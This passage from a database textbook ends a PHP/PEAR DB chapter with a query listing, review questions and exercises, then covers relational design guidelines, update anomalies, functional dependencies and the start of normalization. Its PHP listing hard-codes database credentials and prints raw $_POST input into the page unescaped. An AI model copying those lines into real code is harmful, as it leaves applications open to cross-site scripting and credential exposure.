Illustrating database retrieval queries.

0) require 'DB.php';
1) $d = DB::connect('oci8://acct1:pass12@www.host.com/dbname');
2) if (DB::isError($d)) { die("cannot connect - " . $d->getMessage()); }
3) $d->setErrorHandling(PEAR_ERROR_DIE);

4) $q = $d->query('SELECT Name, Dno FROM EMPLOYEE');
5) while ($r = $q->fetchRow()) {
6)    print "employee $r[0] works for department $r[1] \n" ;
7) }

8) $q = $d->query('SELECT Name FROM EMPLOYEE WHERE Job = ? AND Dno = ?',
9)    array($_POST['emp_job'], $_POST['emp_dno']) );

10) print "employees in dept $_POST[emp_dno] whose job is $_POST[emp_job]: \n" ;

11) while ($r = $q->fetchRow()) {
12)    print "employee $r[0] \n" ;
13) }

14) $allresult = $d->getAll('SELECT Name, Job, Dno FROM EMPLOYEE');
15) foreach ($allresult as $r) {
16)    print "employee $r[0] has job $r[1] and works for department $r[2] \n" ;
17) }

$_POST['emp_dno']. If the user had entered 'Engineer' for the job and 5 for the
department number, the query would select the names of all engineers who worked
in department 5. As we can see, this is a dynamic query whose results differ depend-
ing on the choices that the user enters as input. We used two ? placeholders in this
example, as discussed at the end of Section 3.2.

The last query (lines 14 to 17) shows an alternative way of specifying a query and
looping over its rows. In this example, the function $d->getAll holds all the
records in a query result in a single variable, called $allresult. To loop over the
individual records, a foreach loop can be used, with the row variable $r iterating
over each row in $allresult.2

As we can see, PHP is suited for both database access and creating dynamic Web
pages.

2The $r variable is similar to the cursors and iterator variables.


4 Summary
In this chapter, we gave an overview of how to convert some structured data from
databases into elements to be entered or displayed on a Web page. We focused on
the PHP scripting language, which is becoming very popular for Web database pro-
gramming. Section 1 presented some PHP basics for Web programming through a
simple example. Section 2 gave some of the basics of the PHP language, including its
array and string data types that are used extensively. Section 3 presented an
overview of how PHP can be used to specify various types of database commands,
including creating tables, inserting new records, and retrieving database records.
PHP runs at the server computer in comparison to some other scripting languages
that run on the client computer.

We gave only a very basic introduction to PHP. There are many books as well as
many Web sites devoted to introductory and advanced PHP programming. Many
libraries of functions also exist for PHP, as it is an open source product.

Review Questions
1. Why are scripting languages popular for programming Web applications?
Where in the three-tier architecture does a PHP program execute? Where
does a JavaScript program execute?

2. What type of programming language is PHP?

3. Discuss the different ways of specifying strings in PHP.

4. Discuss the different types of arrays in PHP.

5. What are PHP auto-global variables? Give some examples of PHP auto-
global arrays, and discuss how each is typically used.

6. What is PEAR? What is PEAR DB?

7. Discuss the main functions for accessing a database in PEAR DB, and how
each is used.

8. Discuss the different ways for looping over a query result in PHP.

9. What are placeholders? How are they used in PHP database programming?


Exercises
10. Consider the LIBRARY database schema shown in Figure A.1. Write PHP code
to create the tables of this schema.

11. Write a PHP program that creates Web forms for entering the information
about a new BORROWER entity. Repeat for a new BOOK entity.

12. Write PHP Web interfaces for the queries specified in Exercise 18 from the
chapter “The Relational Algebra and Relational Calculus.”

Selected Bibliography
There are many sources for PHP programming, both in print and on the Web. We
give two books as examples. A very good introduction to PHP is given in Sklar
(2005). For advanced Web site development, the book by Schlossnagle (2005) pro-
vides many detailed examples.


Figure A.1
A relational database schema for a LIBRARY database.

BOOK(Book_id, Title, Publisher_name)
BOOK_AUTHORS(Book_id, Author_name)
PUBLISHER(Name, Address, Phone)
BOOK_COPIES(Book_id, Branch_id, No_of_copies)
BOOK_LOANS(Book_id, Branch_id, Card_no, Date_out, Due_date)
LIBRARY_BRANCH(Branch_id, Branch_name, Address)
BORROWER(Card_no, Name, Address, Phone)


Basics of Functional Dependencies and Normalization for Relational Databases

Each relation schema consists of a number of attributes, and the relational database schema consists of
a number of relation schemas. You may have assumed that attributes are grouped to
form a relation schema by using the common sense of the database designer or by
mapping a database schema design from a conceptual data model such as the
Entity-Relationship (ER) or Enhanced-ER (EER) data model. These models make
the designer identify entity types and relationship types and their respective attrib-
utes, which leads to a natural and logical grouping of the attributes into relations
when mapping procedures are followed. However, we need some formal way of ana-
lyzing why one grouping of attributes into a relation schema may be better than
another. While discussing database design, you may not have developed any meas-
ure of appropriateness or goodness to measure the quality of the design, other than
the intuition of the designer. In this chapter we discuss some of the theory that has
been developed with the goal of evaluating relational schemas for design quality—
that is, to measure formally why one set of groupings of attributes into relation
schemas is better than another.

There are two levels at which we can discuss the goodness of relation schemas. The
first is the logical (or conceptual) level—how users interpret the relation schemas
and the meaning of their attributes. Having good relation schemas at this level
enables users to understand clearly the meaning of the data in the relations, and
hence to formulate their queries correctly. The second is the implementation (or


physical storage) level—how the tuples in a base relation are stored and updated.
This level applies only to schemas of base relations—which will be physically stored
as files—whereas at the logical level we are interested in schemas of both base rela-
tions and views (virtual relations). The relational database design theory developed
in this chapter applies mainly to base relations, although some criteria of appropri-
ateness also apply to views, as shown in Section 1.

As with many design problems, database design may be performed using two
approaches: bottom-up or top-down. A bottom-up design methodology (also
called design by synthesis) considers the basic relationships among individual attrib-
utes as the starting point and uses those to construct relation schemas. This
approach is not very popular in practice1 because it suffers from the problem of
having to collect a large number of binary relationships among attributes as the
starting point. For practical situations, it is next to impossible to capture binary
relationships among all such pairs of attributes. In contrast, a top-down design
methodology (also called design by analysis) starts with a number of groupings of
attributes into relations that exist together naturally, for example, on an invoice, a
form, or a report. The relations are then analyzed individually and collectively, lead-
ing to further decomposition until all desirable properties are met. The theory
described in this chapter is applicable to both the top-down and bottom-up design
approaches, but is more appropriate when used with the top-down approach.

Relational database design ultimately produces a set of relations. The implicit goals
of the design activity are information preservation and minimum redundancy.
Information is very hard to quantify—hence we consider information preservation
in terms of maintaining all concepts, including attribute types, entity types, and
relationship types as well as generalization/specialization relationships, which are
described using a model such as the EER model. Thus, the relational design must
preserve all of these concepts, which are originally captured in the conceptual
design after the conceptual to logical design mapping. Minimizing redundancy
implies minimizing redundant storage of the same information and reducing the
need for multiple updates to maintain consistency across multiple copies of the
same information in response to real-world events that require making an update.

We start this chapter by informally discussing some criteria for good and bad rela-
tion schemas in Section 1. In Section 2, we define the concept of functional depend-
ency, a formal constraint among attributes that is the main tool for formally
measuring the appropriateness of attribute groupings into relation schemas. In
Section 3, we discuss normal forms and the process of normalization using func-
tional dependencies. Successive normal forms are defined to meet a set of desirable
constraints expressed using functional dependencies. The normalization procedure
consists of applying a series of tests to relations to meet these increasingly stringent
requirements and decompose the relations when necessary. In Section 4, we discuss

1An exception in which this approach is used in practice is based on a model called the binary relational
model. An example is the NIAM methodology (Verheijen and VanBekkum, 1982).


more general definitions of normal forms that can be directly applied to any given
design and do not require step-by-step analysis and normalization. Sections 5 to 7
discuss further normal forms up to the fifth normal form. In Section 6 we introduce
the multivalued dependency (MVD), followed by the join dependency (JD) in
Section 7. Section 8 summarizes the chapter.

Further study should continue the development of the theory related to the design
of good relational schemas. This includes: desirable properties of relational decom-
position—nonadditive join property and functional dependency preservation
property; a general algorithm that tests whether or not a decomposition has the
nonadditive (or lossless) join property; properties of functional dependencies and
the concept of a minimal cover of dependencies; the bottom-up approach to data-
base design consisting of a set of algorithms to design relations in a desired normal
form; and define additional types of dependencies that further enhance the evalua-
tion of the goodness of relation schemas.

1 Informal Design Guidelines
for Relation Schemas

Before discussing the formal theory of relational database design, we discuss four
informal guidelines that may be used as measures to determine the quality of relation
schema design:

■ Making sure that the semantics of the attributes is clear in the schema

■ Reducing the redundant information in tuples

■ Reducing the NULL values in tuples

■ Disallowing the possibility of generating spurious tuples

These measures are not always independent of one another, as we will see.

1.1 Imparting Clear Semantics to Attributes in Relations
Whenever we group attributes to form a relation schema, we assume that attributes
belonging to one relation have certain real-world meaning and a proper interpreta-
tion associated with them. The semantics of a relation refers to its meaning result-
ing from the interpretation of attribute values in a tuple. If the conceptual design is
done carefully and the mapping procedure is followed systematically, the relational
schema design should have a clear meaning.


Figure 1
A simplified COMPANY relational database schema.

EMPLOYEE(Ename, Ssn, Bdate, Address, Dnumber)
    P.K.: Ssn; F.K.: Dnumber references DEPARTMENT
DEPARTMENT(Dname, Dnumber, Dmgr_ssn)
    P.K.: Dnumber; F.K.: Dmgr_ssn references EMPLOYEE
DEPT_LOCATIONS(Dnumber, Dlocation)
    P.K.: (Dnumber, Dlocation); F.K.: Dnumber references DEPARTMENT
PROJECT(Pname, Pnumber, Plocation, Dnum)
    P.K.: Pnumber; F.K.: Dnum references DEPARTMENT
WORKS_ON(Ssn, Pnumber, Hours)
    P.K.: (Ssn, Pnumber); F.K.: Ssn references EMPLOYEE, Pnumber references PROJECT

In general, the easier it is to explain the semantics of the relation, the better the rela-
tion schema design will be. To illustrate this, consider Figure 1, a simplified version
of the COMPANY relational database schema in Figure 2, which presents an example
of populated relation states of this schema. The meaning of the EMPLOYEE relation
schema is quite simple: Each tuple represents an employee, with values for the
employee’s name (Ename), Social Security number (Ssn), birth date (Bdate), and
address (Address), and the number of the department that the employee works for
(Dnumber). The Dnumber attribute is a foreign key that represents an implicit rela-
tionship between EMPLOYEE and DEPARTMENT. The semantics of the
DEPARTMENT and PROJECT schemas are also straightforward: Each DEPARTMENT
tuple represents a department entity, and each PROJECT tuple represents a project
entity. The attribute Dmgr_ssn of DEPARTMENT relates a department to the
employee who is its manager, while Dnum of PROJECT relates a project to its con-
trolling department; both are foreign key attributes. The ease with which the mean-
ing of a relation’s attributes can be explained is an informal measure of how well the
relation is designed.


Figure 2
Sample database state for the relational database schema in Figure 1, showing populated
EMPLOYEE, DEPARTMENT, DEPT_LOCATIONS, PROJECT, and WORKS_ON relations.


Figure 3
Two relation schemas suffering from update anomalies. (a) EMP_DEPT(Ename, Ssn, Bdate,
Address, Dnumber, Dname, Dmgr_ssn). (b) EMP_PROJ(Ssn, Pnumber, Hours, Ename, Pname,
Plocation). The lines labeled FD1, FD2, and FD3 under the relations indicate functional
dependencies.

The semantics of the other two relation schemas in Figure 1 are slightly more com-
plex. Each tuple in DEPT_LOCATIONS gives a department number (Dnumber) and
one of the locations of the department (Dlocation). Each tuple in WORKS_ON gives
an employee Social Security number (Ssn), the project number of one of the proj-
ects that the employee works on (Pnumber), and the number of hours per week that
the employee works on that project (Hours). However, both schemas have a well-
defined and unambiguous interpretation. The schema DEPT_LOCATIONS repre-
sents a multivalued attribute of DEPARTMENT, whereas WORKS_ON represents an
M:N relationship between EMPLOYEE and PROJECT. Hence, all the relation
schemas in Figure 1 may be considered as easy to explain and therefore good from
the standpoint of having clear semantics. We can thus formulate the following
informal design guideline.

Guideline 1
Design a relation schema so that it is easy to explain its meaning. Do not combine
attributes from multiple entity types and relationship types into a single relation.
Intuitively, if a relation schema corresponds to one entity type or one relationship
type, it is straightforward to interpret and to explain its meaning. Otherwise, if the
relation corresponds to a mixture of multiple entities and relationships, semantic
ambiguities will result and the relation cannot be easily explained.

Examples of Violating Guideline 1. The relation schemas in Figures 3(a) and
3(b) also have clear semantics. (The reader should ignore the lines under the rela-
tions for now; they are used to illustrate functional dependency notation, discussed
in Section 2.) A tuple in the EMP_DEPT relation schema in Figure 3(a) represents a
single employee but includes additional information—namely, the name (Dname)
of the department for which the employee works and the Social Security number
(Dmgr_ssn) of the department manager. For the EMP_PROJ relation in Figure 3(b),
each tuple relates an employee to a project but also includes the employee name


(Ename), project name (Pname), and project location (Plocation). Although there is
nothing wrong logically with these two relations, they violate Guideline 1 by mixing
attributes from distinct real-world entities: EMP_DEPT mixes attributes of employ-
ees and departments, and EMP_PROJ mixes attributes of employees and projects
and the WORKS_ON relationship. Hence, they fare poorly against the above meas-
ure of design quality. They may be used as views, but they cause problems when
used as base relations, as we discuss in the following section.

1.2 Redundant Information in Tuples
and Update Anomalies

One goal of schema design is to minimize the storage space used by the base rela-
tions (and hence the corresponding files). Grouping attributes into relation
schemas has a significant effect on storage space. For example, compare the space
used by the two base relations EMPLOYEE and DEPARTMENT in Figure 2 with that
for an EMP_DEPT base relation in Figure 4, which is the result of applying the
NATURAL JOIN operation to EMPLOYEE and DEPARTMENT. In EMP_DEPT, the
attribute values pertaining to a particular department (Dnumber, Dname, Dmgr_ssn)
are repeated for every employee who works for that department. In contrast, each
department’s information appears only once in the DEPARTMENT relation in Figure
2. Only the department number (Dnumber) is repeated in the EMPLOYEE relation
for each employee who works in that department as a foreign key. Similar com-
ments apply to the EMP_PROJ relation (see Figure 4), which augments the
WORKS_ON relation with additional attributes from EMPLOYEE and PROJECT.

Storing natural joins of base relations leads to an additional problem referred to as
update anomalies. These can be classified into insertion anomalies, deletion anom-
alies, and modification anomalies.2

Insertion Anomalies. Insertion anomalies can be differentiated into two types,
illustrated by the following examples based on the EMP_DEPT relation:

■ To insert a new employee tuple into EMP_DEPT, we must include either the
attribute values for the department that the employee works for, or NULLs (if
the employee does not work for a department as yet). For example, to insert
a new tuple for an employee who works in department number 5, we must
enter all the attribute values of department 5 correctly so that they are
consistent with the corresponding values for department 5 in other tuples in
EMP_DEPT. In the design of Figure 2, we do not have to worry about this
consistency problem because we enter only the department number in the
employee tuple; all other attribute values of department 5 are recorded only
once in the database, as a single tuple in the DEPARTMENT relation.

■ It is difficult to insert a new department that has no employees as yet in the
EMP_DEPT relation. The only way to do this is to place NULL values in the

attributes for employee. This violates the entity integrity for EMP_DEPT
because Ssn is its primary key. Moreover, when the first employee is assigned
to that department, we do not need this tuple with NULL values any more.
This problem does not occur in the design of Figure 2 because a department
is entered in the DEPARTMENT relation whether or not any employees work
for it, and whenever an employee is assigned to that department, a corre-
sponding tuple is inserted in EMPLOYEE.

2These anomalies were identified by Codd (1972a) to justify the need for normalization of relations, as
we shall discuss in Section 3.

Figure 4
Sample states for EMP_DEPT and EMP_PROJ resulting from applying NATURAL JOIN to the
relations in Figure 2. These may be stored as base relations for performance reasons; the
repeated department and project attribute values are marked as redundancy in the figure.


Deletion Anomalies. The problem of deletion anomalies is related to the second
insertion anomaly situation just discussed. If we delete from EMP_DEPT an
employee tuple that happens to represent the last employee working for a particular
department, the information concerning that department is lost from the database.
This problem does not occur in the database of Figure 2 because DEPARTMENT
tuples are stored separately.

Modification Anomalies. In EMP_DEPT, if we change the value of one of the
attributes of a particular department—say, the manager of department 5—we must
update the tuples of all employees who work in that department; otherwise, the
database will become inconsistent. If we fail to update some tuples, the same depart-
ment will be shown to have two different values for manager in different employee
tuples, which would be wrong.3
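
For instance, the following pair of statements (a sketch only; the new manager Ssn
'123456789' is chosen arbitrarily from the sample data) contrasts the two designs: in the
design of Figure 2 a single DEPARTMENT tuple changes, whereas in EMP_DEPT every tuple of a
department-5 employee must be changed consistently.

-- Design of Figure 2: one tuple is updated.
UPDATE DEPARTMENT
SET    Dmgr_ssn='123456789'
WHERE  Dnumber=5;

-- EMP_DEPT of Figure 4: all department-5 employee tuples must be updated,
-- or the relation becomes inconsistent.
UPDATE EMP_DEPT
SET    Dmgr_ssn='123456789'
WHERE  Dnumber=5;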

It is easy to see that these three anomalies are undesirable and cause difficulties to
maintain consistency of data as well as require unnecessary updates that can be
avoided; hence, we can state the next guideline as follows.

Guideline 2
Design the base relation schemas so that no insertion, deletion, or modification
anomalies are present in the relations. If any anomalies are present,4 note them
clearly and make sure that the programs that update the database will operate
correctly.

The second guideline is consistent with and, in a way, a restatement of the first
guideline. We can also see the need for a more formal approach to evaluating
whether a design meets these guidelines. Sections 2 through 4 provide these needed
formal concepts. It is important to note that these guidelines may sometimes have to
be violated in order to improve the performance of certain queries. If EMP_DEPT is
used as a stored relation (known otherwise as a materialized view) in addition to the
base relations of EMPLOYEE and DEPARTMENT, the anomalies in EMP_DEPT must
be noted and accounted for (for example, by using triggers or stored procedures
that would make automatic updates). This way, whenever the base relation is
updated, we do not end up with inconsistencies. In general, it is advisable to use
anomaly-free base relations and to specify views that include the joins for placing
together the attributes frequently referenced in important queries.
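
As an illustration of this last point, the joined schema can be made available to queries as a view over the anomaly-free base relations instead of being stored itself. The following is only a sketch; it assumes the EMPLOYEE and DEPARTMENT attribute names used in the figures of this chapter, and the view simply recomputes EMP_DEPT from the base relations:

CREATE VIEW EMP_DEPT AS
  SELECT E.Ename, E.Ssn, E.Bdate, E.Address, E.Dnumber,
         D.Dname, D.Dmgr_ssn
  FROM   EMPLOYEE AS E
  JOIN   DEPARTMENT AS D ON E.Dnumber = D.Dnumber;  -- (foreign key, primary key) join

Because every department fact is stored once in DEPARTMENT, changing a manager requires updating a single tuple, and the view reflects the change everywhere without any modification anomaly.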

1.3 NULL Values in Tuples
In some schema designs we may group many attributes together into a “fat” rela-
tion. If many of the attributes do not apply to all tuples in the relation, we end up
with many NULLs in those tuples. This can waste space at the storage level and may

3This is not as serious as the other problems, because all tuples can be updated by a single SQL query.
4Other application considerations may make certain anomalies unavoidable. For example, the
EMP_DEPT relation may correspond to a query or a report that is frequently required.


also lead to problems with understanding the meaning of the attributes and with
specifying JOIN operations at the logical level.5 Another problem with NULLs is how
to account for them when aggregate operations such as COUNT or SUM are applied.
SELECT and JOIN operations involve comparisons; if NULL values are present, the
results may become unpredictable.6 Moreover, NULLs can have multiple interpreta-
tions, such as the following:

■ The attribute does not apply to this tuple. For example, Visa_status may not
apply to U.S. students.

■ The attribute value for this tuple is unknown. For example, the Date_of_birth
may be unknown for an employee.

■ The value is known but absent; that is, it has not been recorded yet. For exam-
ple, the Home_Phone_Number for an employee may exist, but may not be
available and recorded yet.

Having the same representation for all NULLs compromises the different meanings
they may have. Therefore, we may state another guideline.

Guideline 3
As far as possible, avoid placing attributes in a base relation whose values may fre-
quently be NULL. If NULLs are unavoidable, make sure that they apply in exceptional
cases only and do not apply to a majority of tuples in the relation.

Using space efficiently and avoiding joins with NULL values are the two overriding
criteria that determine whether to include the columns that may have NULLs in a
relation or to have a separate relation for those columns (with the appropriate key
columns). For example, if only 15 percent of employees have individual offices,
there is little justification for including an attribute Office_number in the EMPLOYEE
relation; rather, a relation EMP_OFFICES(Essn, Office_number) can be created to
include tuples for only the employees with individual offices.
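
A minimal sketch of such a separate relation, assuming the Essn and Office_number attributes mentioned above and illustrative data types:

CREATE TABLE EMP_OFFICES (
  Essn           CHAR(9)      NOT NULL,  -- the employee's Ssn
  Office_number  VARCHAR(10)  NOT NULL,
  PRIMARY KEY (Essn),
  FOREIGN KEY (Essn) REFERENCES EMPLOYEE (Ssn)
);

Only employees who actually have individual offices get a tuple here, so no NULL office numbers are ever stored in EMPLOYEE.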

1.4 Generation of Spurious Tuples
Consider the two relation schemas EMP_LOCS and EMP_PROJ1 in Figure 5(a),
which can be used instead of the single EMP_PROJ relation in Figure 3(b). A tuple in
EMP_LOCS means that the employee whose name is Ename works on some project
whose location is Plocation. A tuple in EMP_PROJ1 refers to the fact that the
employee whose Social Security number is Ssn works Hours per week on the project
whose name, number, and location are Pname, Pnumber, and Plocation. Figure 5(b)
shows relation states of EMP_LOCS and EMP_PROJ1 corresponding to the

5This is because inner and outer joins produce different results when NULLs are involved in joins. The
users must thus be aware of the different meanings of the various types of joins. Although this is reason-
able for sophisticated users, it may be difficult for others.
6Recall comparisons involving NULL values where the outcome (in three-valued logic) are TRUE,
FALSE, and UNKNOWN.


Figure 5
Particularly poor design for the EMP_PROJ relation in Figure 3(b). (a) The two relation schemas EMP_LOCS and EMP_PROJ1. (b) The result of projecting the extension of EMP_PROJ from Figure 4 onto the relations EMP_LOCS and EMP_PROJ1.

EMP_PROJ relation in Figure 4, which are obtained by applying the appropriate
PROJECT (π) operations to EMP_PROJ (ignore the dashed lines in Figure 5(b) for
now).

Suppose that we used EMP_PROJ1 and EMP_LOCS as the base relations instead of
EMP_PROJ. This produces a particularly bad schema design because we cannot
recover the information that was originally in EMP_PROJ from EMP_PROJ1 and
EMP_LOCS. If we attempt a NATURAL JOIN operation on EMP_PROJ1 and
EMP_LOCS, the result produces many more tuples than the original set of tuples in
EMP_PROJ. In Figure 6, the result of applying the join to only the tuples above the
dashed lines in Figure 5(b) is shown (to reduce the size of the resulting relation).
Additional tuples that were not in EMP_PROJ are called spurious tuples because


Figure 6
Result of applying NATURAL JOIN to the tuples above the dashed lines in EMP_PROJ1 and EMP_LOCS of Figure 5. Generated spurious tuples are marked by asterisks.

they represent spurious information that is not valid. The spurious tuples are
marked by asterisks (*) in Figure 6.
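
The join that generates these spurious tuples can be written directly in SQL. The following is only a sketch to make the operation concrete (it assumes EMP_PROJ1 and EMP_LOCS are stored with the attributes shown in Figure 5); it is equivalent to the NATURAL JOIN here because Plocation is the only attribute the two relations share:

SELECT P.Ssn, P.Pnumber, P.Hours, P.Pname, P.Plocation, L.Ename
FROM   EMP_PROJ1 AS P
JOIN   EMP_LOCS  AS L ON P.Plocation = L.Plocation;

Since Plocation is not a key of either relation, every employee recorded at a location is paired with every project at that location, which is exactly how the extra tuples of Figure 6 arise.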

Decomposing EMP_PROJ into EMP_LOCS and EMP_PROJ1 is undesirable because
when we JOIN them back using NATURAL JOIN, we do not get the correct original
information. This is because in this case Plocation is the attribute that relates
EMP_LOCS and EMP_PROJ1, and Plocation is neither a primary key nor a foreign
key in either EMP_LOCS or EMP_PROJ1. We can now informally state another
design guideline.

Guideline 4
Design relation schemas so that they can be joined with equality conditions on
attributes that form appropriately related (primary key, foreign key) pairs in a way
that guarantees that no spurious tuples are generated. Avoid relations that contain


matching attributes that are not (foreign key, primary key) combinations because
joining on such attributes may produce spurious tuples.

This informal guideline obviously needs to be stated more formally. There is a for-
mal condition called the nonadditive (or lossless) join property that guarantees that
certain joins do not produce spurious tuples.

1.5 Summary and Discussion of Design Guidelines
In Sections 1.1 through 1.4, we informally discussed situations that lead to prob-
lematic relation schemas and we proposed informal guidelines for a good relational
design. The problems we pointed out, which can be detected without additional
tools of analysis, are as follows:

■ Anomalies that cause redundant work to be done during insertion into and
modification of a relation, and that may cause accidental loss of information
during a deletion from a relation

■ Waste of storage space due to NULLs and the difficulty of performing selec-
tions, aggregation operations, and joins due to NULL values

■ Generation of invalid and spurious data during joins on base relations with
matched attributes that may not represent a proper (foreign key, primary
key) relationship

In the rest of this chapter we present formal concepts and theory that may be used
to define the goodness and badness of individual relation schemas more precisely.
First we discuss functional dependency as a tool for analysis. Then we specify the
three normal forms and Boyce-Codd normal form (BCNF) for relation schemas.
The strategy for achieving a good design is to decompose a badly designed relation
appropriately. We also briefly introduce additional normal forms that deal with
additional dependencies.

2 Functional Dependencies
So far we have dealt with the informal measures of database design. We now intro-
duce a formal tool for analysis of relational schemas that enables us to detect and
describe some of the above-mentioned problems in precise terms. The single most
important concept in relational schema design theory is that of a functional
dependency. In this section we formally define the concept, and in Section 3 we see
how it can be used to define normal forms for relation schemas.

2.1 Definition of Functional Dependency
A functional dependency is a constraint between two sets of attributes from the
database. Suppose that our relational database schema has n attributes A1, A2, …,
An; let us think of the whole database as being described by a single universal


relation schema R = {A1, A2, …, An}.7 We do not imply that we will actually store the

database as a single universal table; we use this concept only in developing the for-
mal theory of data dependencies.8

Definition. A functional dependency, denoted by X → Y, between two sets of
attributes X and Y that are subsets of R specifies a constraint on the possible
tuples that can form a relation state r of R. The constraint is that, for any two
tuples t1 and t2 in r that have t1[X] = t2[X], they must also have t1[Y] = t2[Y].

This means that the values of the Y component of a tuple in r depend on, or are
determined by, the values of the X component; alternatively, the values of the X com-
ponent of a tuple uniquely (or functionally) determine the values of the Y compo-
nent. We also say that there is a functional dependency from X to Y, or that Y is
functionally dependent on X. The abbreviation for functional dependency is FD or
f.d. The set of attributes X is called the left-hand side of the FD, and Y is called the
right-hand side.

Thus, X functionally determines Y in a relation schema R if, and only if, whenever
two tuples of r(R) agree on their X-value, they must necessarily agree on their Y-
value. Note the following:

■ If a constraint on R states that there cannot be more than one tuple with a
given X-value in any relation instance r(R)—that is, X is a candidate key of
R—this implies that X → Y for any subset of attributes Y of R (because the
key constraint implies that no two tuples in any legal state r(R) will have the
same value of X). If X is a candidate key of R, then X → R.

■ If X → Y in R, this does not say whether or not Y → X in R.

A functional dependency is a property of the semantics or meaning of the attrib-
utes. The database designers will use their understanding of the semantics of the
attributes of R—that is, how they relate to one another—to specify the functional
dependencies that should hold on all relation states (extensions) r of R. Whenever
the semantics of two sets of attributes in R indicate that a functional dependency
should hold, we specify the dependency as a constraint. Relation extensions r(R)
that satisfy the functional dependency constraints are called legal relation states (or
legal extensions) of R. Hence, the main use of functional dependencies is to
describe further a relation schema R by specifying constraints on its attributes that
must hold at all times. Certain FDs can be specified without referring to a specific
relation, but as a property of those attributes given their commonly understood
meaning. For example, {State, Driver_license_number} → Ssn should hold for any
adult in the United States and hence should hold whenever these attributes appear
in a relation. It is also possible that certain functional dependencies may cease to

7This concept of a universal relation is important in the discussion of algorithms for relational database
design.
8This assumption implies that every attribute in the database should have a distinct name.


Figure 7
A relation state of TEACH (Teacher, Course, Text) with a possible functional dependency Text → Course. However, Teacher → Course is ruled out.

exist in the real world if the relationship changes. For example, the FD Zip_code →
Area_code used to exist as a relationship between postal codes and telephone num-
ber codes in the United States, but with the proliferation of telephone area codes it
is no longer true.

Consider the relation schema EMP_PROJ in Figure 3(b); from the semantics of the
attributes and the relation, we know that the following functional dependencies
should hold:

a. Ssn → Ename
b. Pnumber →{Pname, Plocation}
c. {Ssn, Pnumber} → Hours

These functional dependencies specify that (a) the value of an employee’s Social
Security number (Ssn) uniquely determines the employee name (Ename), (b) the
value of a project’s number (Pnumber) uniquely determines the project name
(Pname) and location (Plocation), and (c) a combination of Ssn and Pnumber values
uniquely determines the number of hours the employee currently works on the
project per week (Hours). Alternatively, we say that Ename is functionally determined
by (or functionally dependent on) Ssn, or given a value of Ssn, we know the value of
Ename, and so on.

A functional dependency is a property of the relation schema R, not of a particular
legal relation state r of R. Therefore, an FD cannot be inferred automatically from a
given relation extension r but must be defined explicitly by someone who knows the
semantics of the attributes of R. For example, Figure 7 shows a particular state of the
TEACH relation schema. Although at first glance we may think that Text → Course,
we cannot confirm this unless we know that it is true for all possible legal states of
TEACH. It is, however, sufficient to demonstrate a single counterexample to disprove
a functional dependency. For example, because ‘Smith’ teaches both ‘Data
Structures’ and ‘Data Management,’ we can conclude that Teacher does not function-
ally determine Course.

Given a populated relation, one cannot determine which FDs hold and which do
not unless the meaning of and the relationships among the attributes are known. All
one can say is that a certain FD may exist if it holds in that particular extension. One
cannot guarantee its existence until the meaning of the corresponding attributes is
clearly understood. One can, however, emphatically state that a certain FD does not


Figure 8
A relation R(A, B, C, D) with its extension.

A    B    C    D
a1   b1   c1   d1
a1   b2   c2   d2
a2   b2   c2   d3
a3   b3   c4   d3

hold if there are tuples that show the violation of such an FD. See the illustrative
example relation in Figure 8. Here, the following FDs may hold because the four
tuples in the current extension have no violation of these constraints: B → C;
C → B; {A, B} → C; {A, B} → D; and {C, D} → B. However, the following do not
hold because we already have violations of them in the given extension: A → B
(tuples 1 and 2 violate this constraint); B → A (tuples 2 and 3 violate this con-
straint); D → C (tuples 3 and 4 violate it).
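
Such a violation can be detected mechanically from a given extension. As a minimal sketch, assuming the relation R of Figure 8 is stored as a table with columns A, B, C, and D, the following self-join returns a row whenever two tuples agree on A but disagree on B:

SELECT R1.A
FROM   R AS R1, R AS R2
WHERE  R1.A = R2.A AND R1.B <> R2.B;  -- any result row disproves A -> B

On the extension of Figure 8 it returns a1 (from tuples 1 and 2), so A → B does not hold. An empty result, however, would only mean that this particular state does not violate the FD, not that the FD holds in general.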

Figure 3 introduces a diagrammatic notation for displaying FDs: Each FD is dis-
played as a horizontal line. The left-hand-side attributes of the FD are connected by
vertical lines to the line representing the FD, while the right-hand-side attributes are
connected by the lines with arrows pointing toward the attributes.

We denote by F the set of functional dependencies that are specified on relation
schema R. Typically, the schema designer specifies the functional dependencies that
are semantically obvious; usually, however, numerous other functional dependencies
hold in all legal relation instances among sets of attributes that can be derived from
and satisfy the dependencies in F. Those other dependencies can be inferred or
deduced from the FDs in F.

3 Normal Forms Based on Primary Keys
Having introduced functional dependencies, we are now ready to use them to spec-
ify some aspects of the semantics of relation schemas. We assume that a set of func-
tional dependencies is given for each relation, and that each relation has a
designated primary key; this information combined with the tests (conditions) for
normal forms drives the normalization process for relational schema design. Most
practical relational design projects take one of the following two approaches:

■ Perform a conceptual schema design using a conceptual model such as ER or
EER and map the conceptual design into a set of relations

■ Design the relations based on external knowledge derived from an existing
implementation of files or forms or reports

Following either of these approaches, it is then useful to evaluate the relations for
goodness and decompose them further as needed to achieve higher normal forms,
using the normalization theory presented in this chapter and the next. We focus in


this section on the first three normal forms for relation schemas and the intuition
behind them, and discuss how they were developed historically. More general defi-
nitions of these normal forms, which take into account all candidate keys of a rela-
tion rather than just the primary key, are deferred to Section 4.

We start by informally discussing normal forms and the motivation behind their
development, as well as reviewing some definitions that are needed here. Then we
discuss the first normal form (1NF) in Section 3.4, and present the definitions of
second normal form (2NF) and third normal form (3NF), which are based on pri-
mary keys, in Sections 3.5 and 3.6, respectively.

3.1 Normalization of Relations
The normalization process, as first proposed by Codd (1972a), takes a relation
schema through a series of tests to certify whether it satisfies a certain normal form.
The process, which proceeds in a top-down fashion by evaluating each relation
against the criteria for normal forms and decomposing relations as necessary, can
thus be considered as relational design by analysis. Initially, Codd proposed three
normal forms, which he called first, second, and third normal form. A stronger def-
inition of 3NF—called Boyce-Codd normal form (BCNF)—was proposed later by
Boyce and Codd. All these normal forms are based on a single analytical tool: the
functional dependencies among the attributes of a relation. Later, a fourth normal
form (4NF) and a fifth normal form (5NF) were proposed, based on the concepts of
multivalued dependencies and join dependencies, respectively; these are briefly dis-
cussed in Sections 6 and 7.

Normalization of data can be considered a process of analyzing the given relation
schemas based on their FDs and primary keys to achieve the desirable properties of
(1) minimizing redundancy and (2) minimizing the insertion, deletion, and update
anomalies discussed in Section 1.2. It can be considered as a “filtering” or “purifica-
tion” process to make the design have successively better quality. Unsatisfactory
relation schemas that do not meet certain conditions—the normal form tests—are
decomposed into smaller relation schemas that meet the tests and hence possess the
desirable properties. Thus, the normalization procedure provides database design-
ers with the following:

■ A formal framework for analyzing relation schemas based on their keys and
on the functional dependencies among their attributes

